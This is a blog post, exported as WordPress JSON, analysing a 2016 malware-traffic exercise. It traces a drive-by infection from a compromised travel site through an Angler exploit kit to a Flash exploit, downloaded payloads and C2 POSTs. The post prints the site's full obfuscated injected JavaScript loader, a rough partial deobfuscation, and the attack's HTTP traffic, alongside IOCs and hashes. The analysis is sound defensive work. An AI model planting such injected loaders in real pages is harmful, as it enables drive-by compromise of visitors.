{"id":437,"date":"2016-03-16T16:31:06","date_gmt":"2016-03-16T16:31:06","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=437"},"modified":"2016-03-16T16:31:06","modified_gmt":"2016-03-16T16:31:06","slug":"malware-exercise-2016-02-28-ideal-versus-reality","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=437","title":{"rendered":"Malware Exercise 2016-02-28 Ideal versus Reality"},"content":{"rendered":"<p>So here is another one from <a href=\"http:\/\/twitter.com\/malware_traffic\" target=\"_blank\">Brad<\/a>. Talking to some of the other guys on the team, we all came to the conclusion that this one seemed kind of &#8220;generic&#8221; (for the lack of a better word); which leads me to believe that I missed something somewhere. LOL. The whole second guessing yourself really does suck at times. But anyways, here is my write-up of this latest one. Enjoy!<\/p>\n<p>About the Investigation<br \/>\n=======================<br \/>\n\u2013 Date and time range of the traffic you\u2019re reviewing.<br \/>\n&gt; 2016-02-28 22:38:13 &#8211; 2016-02-28 22:46:27 Elapsed: 00:08:14<\/p>\n<p>\u2013 IP address, MAC address, and host name.<br \/>\n&gt; 172.16.181.176 \/ 00:c0:4f:f6:3e:74 \/ WIN-DJ3W602WC9M<\/p>\n<p>\u2013 Description of the activity (what happened, if the host became infected, any details, etc.).<br \/>\n&gt; From what I can tell in the PCAP, the end-user went to a compromised site that had a hidden malicious script on the page. The obfuscated Javascript code, I believe, directed the end-user&#8217;s browser (IE v8.0) to the malicious site, which then directed the user to download a malicious Flash file. From there the system became compromised and evidence is seen that some encrypted binaries were downloaded. 
Based on the alerts from the PCAP, I believe that the system has been infected by CryptoLocker via an Angler EK.<\/p>\n<p>\u2013 A conclusion with recommendations for any follow-up actions.<br \/>\n&gt; At this time I would re-image the system to make sure that it is absolutely clean. I would also start looking at any firewall\/gateway\/DNS logs to see if any of the sites mentioned below can be found and if so, pull them off the network for further investigation.<\/p>\n<p>\u2013 Indicators of Compromise (IP, FQDN, etc\u2026)<br \/>\n&gt; 188.121.54.128 \/ www.mysecretdeals.nl<br \/>\n&gt; 85.143.222.170 \/ netmakevitelaoversttelsestidspunkt.timepassion.com<br \/>\n&gt; 192.185.39.66 \/ biocarbon.com.ec<\/p>\n<p>Notes about the investigation<br \/>\n==============================<\/p>\n<p>At approximately 22:43.00 on the 28th of February, the user of the system WIN-DJ3W602WC9M went looking for a travel deal on the site www[.]mysecretdeals[.]nl as seen in the PCAP. From there, it looks as if the site was compromised as there is an obfuscated Javascript found in the code as seen below:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\r\n&lt;div id=&quot;gzyyontewnvauwa&quot; style=&quot;position: absolute; top: -1999px; left: -1370px&quot;&gt;byd i 'cm' e rbmbgbc bpesepesbab h cmasb, dbj cbandwc, abvbtdgaad i c sci 'e' ceacsb rc lckaobdbpd ebaeidue, ccuesecd see cqegaf, ag el. ened dleuece s eldbdwd f dp 96 cgcdbsan 57 bi bud w cf bbbrdodncid ueucu 59 e, gakacakbrax ekd ta k alaobm ataka cak cvepa, pac dud ubx a jc eb. yependbdwdecwbpbrbzancl; dze ae ja qb lcp djepc c; b, ucjay azazbuag btdl. dheje desc u bocbbpb - vazbhdlcsepbhbuahbn. b 47 z bves cvdwa vefajakarcdb fbf a zaj cja lerefajak ardh ewe bevdt dgc a, dic, sb xexegdfeeclbybqbdc c de c ndwdsec ambtbu b vemaabr du dybaarcbba b l cab tekdpexd. 
fdpcg cdbsan bi bu dwb - tagbt c pdjejdxevbbceb jbmclcwecc oct cebobtalb vbuckbs, a pcadkcnb wccbo ahbidsbrcea hbrdn, c. tbt - bnesbc b jbqeiepczem aecobhercca bbobub, i dsctema hc obherbpa. nb lcjbibud aep ahac bp cge saveienc fbuan bo de amdxbmbobeee cf bmchah, cdakaqbsc dbgacbgcfbpbuaabya! v amdx brb, nbab tcd bvesahccd ga p etbqcbbccidsdxenb ab hcpd rce bpbk bebl bu bvcca vbrcndjbrbxc 'bbcbpc' ccfclah bwdqdibqbycaagb nbud w bu bdbpde c oc, ebxbyabb 'jca' dwcfb bbp aydccc bjbzamcle ncibzarbzddd pb rcdbs cscib ycgdx as er acak. e xbxbo amejbj ceduc ze ldl. ae e eb obza k erdue vecdid: w. cmdncj c cb pdhe g e a e x e - cd idw drdj b w blbp bc e je q e q eh cqd yajaoe. obrbnbabtcdbvdw cueddfd nb ve udycnep&lt;\/div&gt;\r\n\r\n\r\n&lt;div id=&quot;ejteaztmik&quot; style=&quot;position: absolute; top: -1602px; left: -1579px&quot;&gt;112;119;105;110;99;101;107;120;111;103;103;107;61;40;43;91;119;105;110;100;111;119;46;115;105;100;101;98;97;\t\t114;93;41;59;99;97;112;103;118;116;119;100;108;113;100;116;119;104;103;61;91;34;114;118;58;49;49;34;44;34;77;83;73;69;34;44;93;59;102;111;114;40;116;114;121;107;106;98;119;101;98;104;61\t\t;112;119;105;110;99;101;107;120;111;103;103;107;59;116;114;121;107;106;98;119;101;98;104;60;99;97;112;103;118;116;119;100;108;113;100;116;119;104;103;46;108;101;110;103;116;104;59;116;1\t\t14;121;107;106;98;119;101;98;104;43;43;41;123;105;102;40;110;97;118;105;103;97;116;111;114;46;117;115;101;114;65;103;101;110;116;46;105;110;100;101;120;79;102;40;99;97;112;103;118;116;1\t\t19;100;108;113;100;116;119;104;103;91;116;114;121;107;106;98;119;101;98;104;93;41;62;112;119;105;110;99;101;107;120;111;103;103;107;41;123;117;122;103;97;99;120;102;111;114;106;118;114;\t\t61;99;97;112;103;118;116;119;100;108;113;100;116;119;104;103;46;108;101;110;103;116;104;45;116;114;121;107;106;98;119;101;98;104;59;98;114;101;97;107;59;125;125;105;102;40;110;97;118;10\t\t5;103;97;116;111;114;46;117;115;101;114;65;103;101;110;116;46;105;110;100;101;120;79;102;40;34;77;83
;73;69;49;48;34;41;62;112;119;105;110;99;101;107;120;111;103;103;107;41;123;117;122;1\t\t03;97;99;120;102;111;114;106;118;114;43;43;59;125;117;121;108;121;98;103;109;111;108;116;113;61;117;122;103;97;99;120;102;111;114;106;118;114;45;49;59;117;97;107;120;122;102;105;119;106\t\t;100;115;121;110;61;34;68;55;50;89;66;65;104;76;90;74;90;116;34;59;97;99;104;102;120;120;120;117;114;118;120;117;101;61;100;111;99;117;109;101;110;116;46;103;101;116;69;108;101;109;101;\t\t110;116;66;121;73;100;40;34;103;122;121;121;111;110;116;101;119;110;118;97;117;119;97;34;41;46;105;110;110;101;114;72;84;77;76;59;117;101;108;112;111;106;106;100;97;118;116;98;100;108;6\t\t1;112;119;105;110;99;101;107;120;111;103;103;107;59;99;122;104;101;97;106;116;102;112;115;61;112;119;105;110;99;101;107;120;111;103;103;107;59;102;117;108;114;101;111;111;100;100;104;10\t\t8;118;98;104;109;113;113;61;34;34;59;102;111;114;40;116;114;121;107;106;98;119;101;98;104;61;112;119;105;110;99;101;107;120;111;103;103;107;59;116;114;121;107;106;98;119;101;98;104;60;9\t\t7;99;104;102;120;120;120;117;114;118;120;117;101;46;108;101;110;103;116;104;59;116;114;121;107;106;98;119;101;98;104;43;61;117;121;108;121;98;103;109;111;108;116;113;41;123;101;102;112;\t\t122;118;100;113;120;115;118;111;109;101;120;61;97;99;104;102;120;120;120;117;114;118;120;117;101;46;99;104;97;114;67;111;100;101;65;116;40;116;114;121;107;106;98;119;101;98;104;41;59;10\t\t5;102;40;101;102;112;122;118;100;113;120;115;118;111;109;101;120;62;61;57;55;38;38;101;102;112;122;118;100;113;120;115;118;111;109;101;120;60;61;49;50;50;41;123;105;102;40;117;101;108;1\t\t12;111;106;106;100;97;118;116;98;100;108;37;117;122;103;97;99;120;102;111;114;106;118;114;41;123;102;117;108;114;101;111;111;100;100;104;108;118;98;104;109;113;113;43;61;83;116;114;105;\t\t110;103;46;102;114;111;109;67;104;97;114;67;111;100;101;40;40;40;113;122;102;118;122;120;106;110;114;105;103;113;115;111;109;43;101;102;112;122;118;100;113;120;115;118;111;109;101;120;4\t\t5;57;55;41;94;117;97;
107;120;122;102;105;119;106;100;115;121;110;46;99;104;97;114;67;111;100;101;65;116;40;99;122;104;101;97;106;116;102;112;115;37;117;97;107;120;122;102;105;119;106;10\t\t0;115;121;110;46;108;101;110;103;116;104;41;41;37;50;53;53;41;59;99;122;104;101;97;106;116;102;112;115;43;43;59;125;101;108;115;101;123;113;122;102;118;122;120;106;110;114;105;103;113;1\t\t15;111;109;61;40;101;102;112;122;118;100;113;120;115;118;111;109;101;120;45;57;55;41;42;50;54;59;125;117;101;108;112;111;106;106;100;97;118;116;98;100;108;43;43;59;125;125;91;93;91;34;9\t\t9;111;110;115;116;114;117;99;116;111;114;34;93;91;34;99;111;110;115;116;114;117;99;116;111;114;34;93;40;102;117;108;114;101;111;111;100;100;104;108;118;98;104;109;113;113;41;40;41;59&lt;\/ div&gt;\r\n\t&lt;script&gt;\r\n\twobqesyszfi=&quot;\\x2e\\x73&quot;;\r\n\tnnkhgqgbpsdk=&quot;\\x53&quot;;\r\n\tnmbekhwxixcb=&quot;\\x6e\\x67&quot;;\r\n\tjdmqeslorgubbhdk=&quot;\\x64\\x6f&quot;;\r\n\twobqesyszfi=wobqesyszfi+&quot;\\x70&quot;;\r\n\tnmbekhwxixcb=nmbekhwxixcb+&quot;\\x2e\\x66&quot;;\r\n\tgxylmrwaor=&quot;\\x2e&quot;;\r\n\tgxylmrwaor=gxylmrwaor+&quot;\\x61\\x70&quot;;\r\n\tjazrnxwtcbwzwld=&quot;\\x28&quot;;\r\n\tewhhvshumeic=&quot;\\x65\\x76\\x61\\x6c&quot;;\r\n\tylsxnjfqplhwvl=&quot;\\x69\\x6e\\x6e\\x65\\x72&quot;;\r\n\tjazrnxwtcbwzwld=jazrnxwtcbwzwld+&quot;\\x22&quot;;\r\n\tuyzsesecha=&quot;\\x63\\x6f\\x6e&quot;;\r\n\tnmbekhwxixcb=nmbekhwxixcb+&quot;\\x72\\x6f&quot;;\r\n\tgxylmrwaor=gxylmrwaor+&quot;\\x70\\x6c\\x79\\x28\\x6e\\x75\\x6c\\x6c&quot;;\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+&quot;\\x63\\x75\\x6d&quot;;\r\n\tgxylmrwaor=gxylmrwaor+&quot;\\x2c&quot;;\r\n\twobqesyszfi=wobqesyszfi+&quot;\\x6c&quot;;\r\n\twobqesyszfi=wobqesyszfi+&quot;\\x69\\x74\\x28&quot;;\r\n\tylsxnjfqplhwvl=ylsxnjfqplhwvl+&quot;\\x48\\x54&quot;;\r\n\tuyzsesecha=uyzsesecha+&quot;\\x73&quot;;\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+&quot;\\x65\\x6e&quot;;\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+&quot;\\x74\\x2e&quot;;\r\n\tnnkhgqgbpsdk=nnkhgqgbpsdk+&quot;\\x74\
\x72\\x69&quot;;\r\n\tblmqgofrutify=&quot;\\x6d&quot;;\r\n\twobqesyszfi=wobqesyszfi+&quot;\\x22&quot;;\r\n\twobqesyszfi=wobqesyszfi+&quot;\\x3b\\x22\\x29\\x29&quot;;\r\n\tuyzsesecha=uyzsesecha+&quot;\\x74\\x72\\x75\\x63\\x74&quot;;\r\n\tjazrnxwtcbwzwld=jazrnxwtcbwzwld+&quot;\\x65\\x6a&quot;;\r\n\tblmqgofrutify=blmqgofrutify+&quot;\\x43\\x68\\x61\\x72\\x43&quot;;\r\n\tmlefnllgucu=&quot;\\x28&quot;;\r\n\thlaybuppfayjd=&quot;\\x29&quot;;\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+&quot;\\x67\\x65\\x74&quot;;\r\n\tuyzsesecha=uyzsesecha+&quot;\\x6f&quot;;\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+&quot;\\x45&quot;;\r\n\tuyzsesecha=uyzsesecha+&quot;\\x72&quot;;\r\n\tjazrnxwtcbwzwld=jazrnxwtcbwzwld+&quot;\\x74&quot;;\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+&quot;\\x6c\\x65\\x6d\\x65\\x6e&quot;;\r\n\tjazrnxwtcbwzwld=jazrnxwtcbwzwld+&quot;\\x65\\x61&quot;;\r\n\tjazrnxwtcbwzwld=jazrnxwtcbwzwld+&quot;\\x7a\\x74\\x6d\\x69\\x6b\\x22\\x29\\x2e&quot;;\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+&quot;\\x74\\x42\\x79\\x49&quot;;\r\n\tblmqgofrutify=blmqgofrutify+&quot;\\x6f\\x64\\x65&quot;;\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+&quot;\\x64&quot;;\r\n\tylsxnjfqplhwvl=ylsxnjfqplhwvl+&quot;\\x4d\\x4c&quot;;\r\n\t&#x5B;]&#x5B;uyzsesecha]&#x5B;uyzsesecha](ewhhvshumeic + mlefnllgucu + nnkhgqgbpsdk + nmbekhwxixcb + blmqgofrutify + gxylmrwaor + jdmqeslorgubbhdk + jazrnxwtcbwzwld + ylsxnjfqplhwvl + wobqesyszfi + \t\thlaybuppfayjd)();\r\n\t&lt;\/script&gt;<\/pre>\n<p>I was not able to de-obfuscate the top bit of the script, but the bottom part I managed to manually deobfuscate it (I know that there are better ways of doing it, I am just not sure of them and I did not go Googling for it either). 
The code looks something like this:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\twobqesyszfi=.s\r\n\tnnkhgqgbpsdk=S\r\n\tnmbekhwxixcb=ng\r\n\tjdmqeslorgubbhdk=do\r\n\twobqesyszfi=.sp\r\n\tnmbekhwxixcb=ng.f\r\n\tgxylmrwaor=.\r\n\tgxylmrwaor=.ap\r\n\tjazrnxwtcbwzwld=(\r\n\tewhhvshumeic=eval\r\n\tylsxnjfqplhwvl=inner\r\n\tjazrnxwtcbwzwld=(&quot;\r\n\tuyzsesecha=con\r\n\tnmbekhwxixcb=ng.fro\r\n\tgxylmrwaor=.apply(null\r\n\tjdmqeslorgubbhdk=docum\r\n\tgxylmrwaor=.apply(null,\r\n\twobqesyszfi=.spl\r\n\twobqesyszfi=.split(\r\n\tylsxnjfqplhwvl=innerHT\r\n\tuyzsesecha=cons\r\n\tjdmqeslorgubbhdk=documen \r\n\tjdmqeslorgubbhdk=document. \r\n\tnnkhgqgbpsdk=Stri \r\n\tblmqgofrutify=m \r\n\twobqesyszfi=.split(&quot; \r\n\twobqesyszfi=.split(&quot;&quot;)) \r\n\tuyzsesecha=construct \r\n\tjazrnxwtcbwzwld=(&quot;ej \r\n\tblmqgofrutify=mCharC \r\n\tmlefnllgucu=(\r\n\thlaybuppfayjd=)\r\n\tjdmqeslorgubbhdk=document.get\r\n\tuyzsesecha=constructo\r\n\tjdmqeslorgubbhdk=document.get+E\r\n\tuyzsesecha=constructor\r\n\tjazrnxwtcbwzwld=(&quot;ejt\r\n\tjdmqeslorgubbhdk=(&quot;ejtlemen\r\n\tjazrnxwtcbwzwld=(&quot;ejtea\r\n\tjazrnxwtcbwzwld=(&quot;ejteaztmik&quot;).\r\n\tjdmqeslorgubbhdk=(&quot;ejtlementByI\r\n\tblmqgofrutify=mCharCode\r\n\tjdmqeslorgubbhdk=(&quot;ejtlementById\r\n\tylsxnjfqplhwvl=innerHTML\r\n\t&#x5B;]&#x5B;constructor]&#x5B;constructor](eval(String.fromCharCode.apply(null,(&quot;ejtlementById(&quot;ejteaztmik&quot;)innerHTML.split(&quot;&quot;))))();<\/pre>\n<p>From here it looks as if the end-user was guided to the malicious site that is hosting the Angler EK as seen here:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/boards\/viewforum.php?f=58&amp;sid=yr897n65jrb5870 HTTP\/1.1\r\n\tAccept: image\/gif, image\/jpeg, image\/pjpeg, application\/x-ms-application, 
application\/vnd.ms-xpsdocument, application\/xaml+xml, application\/x-ms-xbap, *\/*\r\n\tReferer: http:\/\/www.mysecretdeals.nl\/\r\n\tAccept-Language: en-us\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident\/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: netmakevitelaoversttelsestidspunkt.timepassion.com\r\n\tConnection: Keep-Alive\r\n\t\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.9.12\r\n\tDate: Sun, 28 Feb 2016 22:43:21 GMT\r\n\tContent-Type: text\/html\r\n\tContent-Length: 108254\r\n\tConnection: keep-alive\r\n\tSet-Cookie: 25931d49efb527d3=4; expires=Sun, 28-Feb-2016 22:56:39 GMT; Max-Age=759; path=\/sdfnksjgbkd\r\n\t\r\n\t&lt;!DOCTYPE html&gt;\r\n\t&lt;html&gt;\r\n\t\r\n\t&lt;head&gt;\r\n\t    \r\n\t    &lt;title&gt;\r\n\t        it. here\r\n\t    &lt;\/title&gt;\r\n\t&lt;\/head&gt;\r\n\t\r\n\t&lt;body&gt;\r\n\r\n\r\n\t  lost no time to deliberate and judge.&quot; &quot;But I do not know; for WE of course made every necessary arrangement with the fortitude of an affair, a connection--but need\r\n\t\r\n\r\n\t&lt;s&gt;\r\n\t &lt;i&gt;\r\n\t  &quot; &quot;You would not interest.--I know of no profession at all.&quot;<\/pre>\n<p>At this point, it looks like the infection of the system starts as we see a call for a Flash file:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/state.web?cold=&amp;cost=d5FxlISZeZ&amp;discover=&amp;enter=YLBQglDPR&amp;small=lRl7&amp;four=SnYlNzQTvE&amp;themselves=4k28hYBwac&amp;work=&amp;business=mxCZi HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/netmakevitelaoversttelsestidspunkt.timepassion.com\/boards\/viewforum.php?f=58&amp;sid=yr897n65jrb5870\r\n\tx-flash-version: 11,9,900,117\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident\/4.0; 
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\r\n\tHost: netmakevitelaoversttelsestidspunkt.timepassion.com\r\n\tConnection: Keep-Alive\r\n\t\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.9.12\r\n\tDate: Sun, 28 Feb 2016 22:43:34 GMT\r\n\tContent-Type: application\/x-shockwave-flash\r\n\tContent-Length: 64564\r\n\tConnection: keep-alive\r\n\tSet-Cookie: ebcdd9a5f0f651f4002=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=\/sdfnksjgbkd\r\n\t\r\n\tCWS\r\n\t....x<\/pre>\n<p>and then what I believe to be encrypted binaries being pulled down:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/center.zhtml?white=q4Oi2zp&amp;enjoy=gOwqO&amp;too=d261z&amp;knowledge=BbbhYsrB0E&amp;procedure=-OTumdS2L&amp;low=dZyrI&amp;carry=dChAB8P HTTP\/1.1\r\n\tAccept: *\/*\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident\/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\r\n\tReferer: http:\/\/www.mysecretdeals.nl\/\r\n\tAccept-Language: en-us\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: netmakevitelaoversttelsestidspunkt.timepassion.com\r\n\tConnection: Keep-Alive\r\n\t\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.9.12\r\n\tDate: Sun, 28 Feb 2016 22:43:40 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 372756\r\n\tConnection: keep-alive\r\n\tSet-Cookie: 86bdef36936e928f0717fa17=ede2aab62cb4b8b4ad5d7595974f368; expires=Sun, 28-Feb-2016 23:39:44 GMT; Max-Age=3325; path=\/sdfnksjgbkd\r\n\t\r\n\te.zgE\r\n\r\n\t-----\r\n\t\r\n\tGET \/thus.zfo?different=IaU_lMeX3O&amp;institution=ICg9nM&amp;success=1DE8hbm9&amp;southern=_TPIKGykTU&amp;direct=UrB1-5IP9Ebbnz HTTP\/1.1\r\n\tAccept: *\/*\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident\/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\r\n\tReferer: 
http:\/\/www.mysecretdeals.nl\/\r\n\tAccept-Language: en-us\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: netmakevitelaoversttelsestidspunkt.timepassion.com\r\n\tConnection: Keep-Alive\r\n\t\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.9.12\r\n\tDate: Sun, 28 Feb 2016 22:43:52 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 372756\r\n\tConnection: keep-alive\r\n\tSet-Cookie: 0e67a4b0cb7e67=915cbb5ef5ed1bc926c5593bd1; expires=Sun, 28-Feb-2016 23:09:53 GMT; Max-Age=1523; path=\/sdfnksjgbkd\r\n\t\r\n\t..5...iZ..z.....1...1...17....^KSr.$.Jd....<\/pre>\n<p>After the first GET request above, we see the start of POSTs being sent to another server:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tPOST \/wp-content\/uploads\/bstr.php HTTP\/1.1\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.3; WOW64; Trident\/7.0; Touch; rv:11.0) like Gecko\r\n\tHost: biocarbon.com.ec\r\n\tContent-Length: 645\r\n\tCache-Control: no-cache\r\n\t\r\n\tdata=AFAA7EF96957AF623769DB8A2D403F7F570FF3481F39D30BEB29F7E428F3AFDB2D6CFED0B0DC5E2A736708790A48012595F4DEA6B2A7B39182E75BDA74CEFE1CA987E7A1014847BEED0AEF99D2FB8C926F7DF2A38013FFDCF05\t2FA64C3C8114E11EDB1974CC9C2AC9F60D30C99D4B46FC677CE2C2BE78A8193E3CCD665D2BCE705D7B26C9DCDC93BE02A59CF23C2BE8BFBA168B54329908DCF2445BE1DAF230E29C2262975B95125CB493937C2B5B16BEA5E217C286\t997809A08BBE69F61A0877843C1989A2259419EB2AB946B430A37073F7526E10DB30DAA2BE5BDFA517FAA6AE2DF99D3E8F6AF3895B58A4B35CFCF71DFDB63C3B9B27DE852B3D69\t7C269A8F956ED5ADF62873B2CD11EE42353ECD0023E105005D8C52C53D5AFDF17D3C490DB1C7DCACB1B6395D90CA2525BA9A0A3E9444572C5FC45AB67C2B7929994024AHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.1\r\n\tDate: Sun, 28 Feb 2016 22:43:53 GMT\r\n\tContent-Type: text\/html\r\n\tTransfer-Encoding: chunked\r\n\tConnection: 
keep-alive\r\n\t\r\n\t14\r\n\t---!!!INSERTED!!!---\r\n\t0\r\n\t\r\n\t-----\r\n\r\n\tPOST \/wp-content\/uploads\/bstr.php HTTP\/1.1\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.3; WOW64; Trident\/7.0; Touch; rv:11.0) like Gecko\r\n\tHost: biocarbon.com.ec\r\n\tContent-Length: 645\r\n\tCache-Control: no-cache\r\n\t\r\n\tdata=FF982F7A97833388A40909A5E1EBAEE226AE92B7DBCD01C93B775D4D943B4ECF3FADEB176E8A5A9BC046FDF16318A365FCB569428A7A71D6ED10946662AC4157976110F7883000DCB9A2BDBD7F332F2DAB4C22A1DE73BBE57AE\t062F838A6065D73AC39C85578B6F42D9898C433EC3D5AFD77FB1FF2D8594BEF886B235576A753591D61B94B8CEC5C8658393DCA1182FEA1031ADE3DA0DD4D9FB10CB2EC48457751E0A1349A0E66DAE4550D2479D1D453258A8A615A3\tC12852CDB01CE1BA1B77145550DB51829E6DF6574F9ED3F6FCEF64A9D475F6350D4D4F501251872BA1A11254F0AB41C5FE14BF4D33A3002F0345553A1A3020298F383A8B28C2C7\t77A268A722062F6FE6056BA756005575991EFA3217113991C0FA9445CF282D7F091EE7FB8E5BC9E27C82A883B1871A30C6EB3BABDAFE2F390AB4F4C6782DC87E083AC55HTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.1\r\n\tDate: Sun, 28 Feb 2016 22:44:37 GMT\r\n\tContent-Type: text\/html\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\t\r\n\t14\r\n\t---!!!INSERTED!!!---\r\n\t0<\/pre>\n<p>And from this point on we don&#8217;t see anything else. 
The only thing that I have been able to get from the PCAP is the Flash file:<\/p>\n<p>File: netmakevitelaoversttelsestidspunkt.timepassion.com.swf<br \/>\nSize: 63.0 KB<br \/>\nSHA256: eca4004459c2e8cc148fb4838b7c6f909d796492e9c375e8ee22923fdbc12c0c<br \/>\nMD5: d14b011b930bf3b4666f0933a7516912<br \/>\nFirst Submission: 2016-02-29 05:36:24 UTC<br \/>\nDetection ratio: 22 \/ 56<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/eca4004459c2e8cc148fb4838b7c6f909d796492e9c375e8ee22923fdbc12c0c\/analysis\/1457717421\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/eca4004459c2e8cc148fb4838b7c6f909d796492e9c375e8ee22923fdbc12c0c\/analysis\/1457717421\/<\/a><\/p>\n<p>Based on the results from VirusTotal, and also since we saw the Angler EK page above, this looks to be Angler EK leading to *Crypt infection (either Alpha or Tesla). Unfortunately I am not seeing anything else in the PCAP that shows the landing page of the usual *Crypt infection. As usual, you can find the Flash file and the obfuscated Javascript in my <a href=\"http:\/\/github.com\/bloomer1016\/Malware-exercise-2016-02-28\" target=\"_blank\">GitHub repo<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>So here is another one from Brad. Talking to some of the other guys on the team, we all came to the conclusion that this one seemed kind of &#8220;generic&#8221; (for the lack of a better word); which leads me to believe that I missed something somewhere. LOL. The whole second guessing yourself really does suck at times. But anyways, here is my write-up of this latest one. Enjoy! About the Investigation ======================= \u2013 Date and time range of the traffic you\u2019re reviewing. &gt; 2016-02-28 22:38:13 &#8211; 2016-02-28 22:46:27 Elapsed: 00:08:14 \u2013 IP address, MAC address, and host name. 
&gt;&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=437\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-437","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/437","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=437"}],"version-history":[{"count":4,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/437\/revisions"}],"predecessor-version":[{"id":441,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/437\/revisions\/441"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=437"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=437"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=437"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}